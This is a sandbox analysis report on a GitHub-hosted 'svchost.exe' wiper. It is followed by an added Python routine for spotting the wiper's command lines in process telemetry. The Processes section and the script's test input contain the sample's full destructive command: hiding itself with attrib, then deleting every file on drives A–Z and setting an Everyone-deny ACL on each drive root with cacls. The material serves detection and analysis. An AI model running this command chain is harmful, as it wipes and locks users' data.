Analysis Overview
Threat Level: Likely malicious
The file https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Detects Pyinstaller
Views/modifies file attributes
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
NTFS ADS
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-10 14:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 14:40
Reported
2024-05-10 14:43
Platform
win10v2004-20240426-en
Max time kernel
173s
Max time network
162s
Command Line
Signatures
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\cacls.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\bootim.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Globalization\ICU\icudtl.dat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\system32\bootim.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\bootim.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\bootim.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\bootim.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "237" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 207892.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\bootim.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\bootim.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mmc.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6d1046f8,0x7ffd6d104708,0x7ffd6d104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5468 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6060 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Users\Admin\Downloads\svchost.exe
"C:\Users\Admin\Downloads\svchost.exe"
C:\Users\Admin\Downloads\svchost.exe
"C:\Users\Admin\Downloads\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s svchost.exe
C:\Windows\system32\attrib.exe
attrib +h +s svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c timeout 1 & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & del A:\*.* /f /s /q & cacls A:\ /e /p everyone:n & del B:\*.* /f /s /q & cacls B:\ /e /p everyone:n & del D:\*.* /f /s /q & cacls D:\ /e /p everyone:n & del E:\*.* /f /s /q & cacls E:\ /e /p everyone:n & del F:\*.* /f /s /q & cacls F:\ /e /p everyone:n & del G:\*.* /f /s /q & cacls G:\ /e /p everyone:n & del H:\*.* /f /s /q & cacls H:\ /e /p everyone:n & del I:\*.* /f /s /q & cacls I:\ /e /p everyone:n & del J:\*.* /f /s /q & cacls J:\ /e /p everyone:n & del K:\*.* /f /s /q & cacls K:\ /e /p everyone:n & del L:\*.* /f /s /q & cacls L:\ /e /p everyone:n & del M:\*.* /f /s /q & cacls M:\ /e /p everyone:n & del N:\*.* /f /s /q & cacls N:\ /e /p everyone:n & del O:\*.* /f /s /q & cacls O:\ /e /p everyone:n & del P:\*.* /f /s /q & cacls P:\ /e /p everyone:n & del Q:\*.* /f /s /q & cacls Q:\ /e /p everyone:n & del R:\*.* /f /s /q & cacls R:\ /e /p everyone:n & del S:\*.* /f /s /q & cacls S:\ /e /p everyone:n & del T:\*.* /f /s /q & cacls T:\ /e /p everyone:n & del U:\*.* /f /s /q & cacls U:\ /e /p everyone:n & del V:\*.* /f /s /q & cacls V:\ /e /p everyone:n & del W:\*.* /f /s /q & cacls W:\ /e /p everyone:n & del X:\*.* /f /s /q & cacls X:\ /e /p everyone:n & del Y:\*.* /f /s /q & cacls Y:\ /e /p everyone:n & del Z:\*.* /f /s /q & cacls Z:\ /e /p everyone:n & del C:\*.* /f /s /q & cacls C:\ /e /p everyone:n
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cacls.exe
cacls A:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls B:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls D:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls E:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls F:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls G:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls H:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls I:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls J:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls K:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls L:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls M:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls N:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls O:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls P:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Q:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls R:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls S:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls T:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls U:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls V:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls W:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls X:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Y:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Z:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls C:\ /e /p everyone:n
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault9eb942a4h4d64h4970h8903h042002736874
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd6d1046f8,0x7ffd6d104708,0x7ffd6d104718
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" C:\Windows\system32\devmgmt.msc
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38cf855 /state1:0x41c64e6d
C:\Windows\system32\bootim.exe
bootim.exe /startpage:1
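The process list above shows the whole payload: the PyInstaller-packed svchost.exe spawns one cmd.exe to hide itself (attrib +h +s), then a second cmd.exe whose single command line deletes every file on drives A: through Z: and C: (del X:\*.* /f /s /q) and then strips Everyone's access to each drive root (cacls X:\ /e /p everyone:n). Two points matter for detection: del and echo are cmd.exe builtins, so process-creation telemetry (Sysmon Event ID 1, Security 4688) never shows them as child processes, only the parent cmd.exe command line carries them; and the cacls.exe children are what the sandbox labels "Enumerates connected drives", since cacls opens each drive root in turn. The triage routine below is an added example, not part of this report or of the sample, that applies that reasoning to process-creation records: it strips the cmd.exe /c prefix, splits the chain on unquoted ampersands, classifies each sub-command, and calls the chain a wiper when the same drive roots are both wiped and locked. The sample input is transcribed from the Processes section (the 26-drive chain is regenerated in the sample's own A, B, D..Z, C order); the rule names, the three-drive threshold and the function names are assumptions of the example.

```python
import re
from typing import Optional, Tuple

# Constructed input: command lines transcribed from the "Processes" section of
# this report. The del/cacls chain is rebuilt in the order the sample used.
_DRIVES = "ABDEFGHIJKLMNOPQRSTUVWXYZC"
WIPER_CHAIN = (
    r"C:\Windows\system32\cmd.exe /c timeout 1 & "
    + " & ".join(["echo Installing..."] * 6) + " & "
    + " & ".join(rf"del {d}:\*.* /f /s /q & cacls {d}:\ /e /p everyone:n" for d in _DRIVES)
)
SAMPLE_EVENTS = [  # (image path, command line), as Sysmon EID 1 / 4688 would record them
    (r"C:\Users\Admin\Downloads\svchost.exe", r'"C:\Users\Admin\Downloads\svchost.exe"'),
    (r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c attrib +h +s svchost.exe"),
    (r"C:\Windows\system32\attrib.exe", "attrib +h +s svchost.exe"),
    (r"C:\Windows\system32\cmd.exe", WIPER_CHAIN),
    (r"C:\Windows\system32\timeout.exe", "timeout 1"),
    (r"C:\Windows\system32\cacls.exe", r"cacls A:\ /e /p everyone:n"),
]

_CMD_PREFIX = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[cCkK]\s+', re.I)
_TOKEN = re.compile(r'"[^"]*"|\S+')          # keep quoted arguments together
_DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\$")   # X:\
_DRIVE_GLOB = re.compile(r"^[A-Za-z]:\\\*(?:\.\*)?$")  # X:\* or X:\*.*


def split_cmd_chain(cmdline: str) -> list:
    """Drop a leading 'cmd.exe /c' (or /k) and split the rest on '&' (and so
    '&&') outside double quotes. '^' is cmd.exe's escape character outside
    quotes, so '^&' is kept as a literal ampersand."""
    body = _CMD_PREFIX.sub("", cmdline, count=1)
    parts, buf, in_quote, i = [], [], False, 0
    while i < len(body):
        ch = body[i]
        if ch == '"':
            in_quote = not in_quote
            buf.append(ch)
        elif ch == "^" and not in_quote and i + 1 < len(body):
            buf.append(body[i + 1])
            i += 1
        elif ch == "&" and not in_quote:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def classify(subcmd: str) -> Optional[Tuple[str, Optional[str], str]]:
    """Return (rule, drive letter or None, evidence) for one sub-command, or
    None when it matches nothing. Rule names are this example's own."""
    toks = [t for t in (x.strip('"') for x in _TOKEN.findall(subcmd)) if t]
    if not toks:
        return None
    verb = toks[0].lower()
    flags = {t.lower() for t in toks[1:] if t[0] in "/+-"}
    args = [t for t in toks[1:] if t[0] not in "/+-"]
    if verb in ("del", "erase") and {"/s", "/q"} <= flags:      # recursive, no prompt
        for a in args:
            if _DRIVE_GLOB.match(a):
                return ("del_drive_root", a[0].upper(), subcmd)
    if verb == "cacls" and "/p" in flags:                       # /p <principal>:n = no access
        denied = [a for a in args if re.fullmatch(r"[^:\s]+:n", a, re.I)]
        roots = [a for a in args if _DRIVE_ROOT.match(a)]
        if denied and roots:
            return ("cacls_deny_drive_root", roots[0][0].upper(), subcmd)
    if verb == "attrib" and {"+h", "+s"} <= flags:              # hidden + system on own binary
        return ("attrib_hide_system", None, subcmd)
    if verb == "timeout":
        return ("timeout_delay", None, subcmd)
    return None


def triage(events) -> dict:
    """Classify every sub-command of every process-creation record. Verdict is
    'wiper' when at least three drive roots are both deleted and locked
    (threshold is an assumption), 'suspicious' on any other hit, else 'clean'."""
    findings, wiped, locked = [], set(), set()
    for image, cmdline in events:
        subcmds = split_cmd_chain(cmdline) if image.lower().endswith("cmd.exe") else [cmdline]
        for sc in subcmds:
            hit = classify(sc)
            if hit is None:
                continue
            rule, drive, evidence = hit
            findings.append((image, rule, evidence))
            if rule == "del_drive_root":
                wiped.add(drive)
            elif rule == "cacls_deny_drive_root":
                locked.add(drive)
    rules = {r for _, r, _ in findings}
    verdict = "wiper" if len(wiped & locked) >= 3 else ("suspicious" if rules else "clean")
    return {"findings": findings, "rules": rules, "drives_wiped": wiped,
            "drives_locked": locked, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    print(result["verdict"], sorted(result["rules"]), len(result["drives_wiped"]), "drives")
```

Against the transcribed events this reports a wiper verdict with all 26 drive letters both wiped and locked, plus the attrib and timeout hits. The cacls lock matters operationally: once Everyone is set to N on C:\, even an administrator has to take ownership (the SeTakeOwnershipPrivilege use by bootim.exe in the report is recovery-environment behaviour, not the sample's) before the ACL can be repaired, so the command line is worth blocking before the first cacls child ever starts.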
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
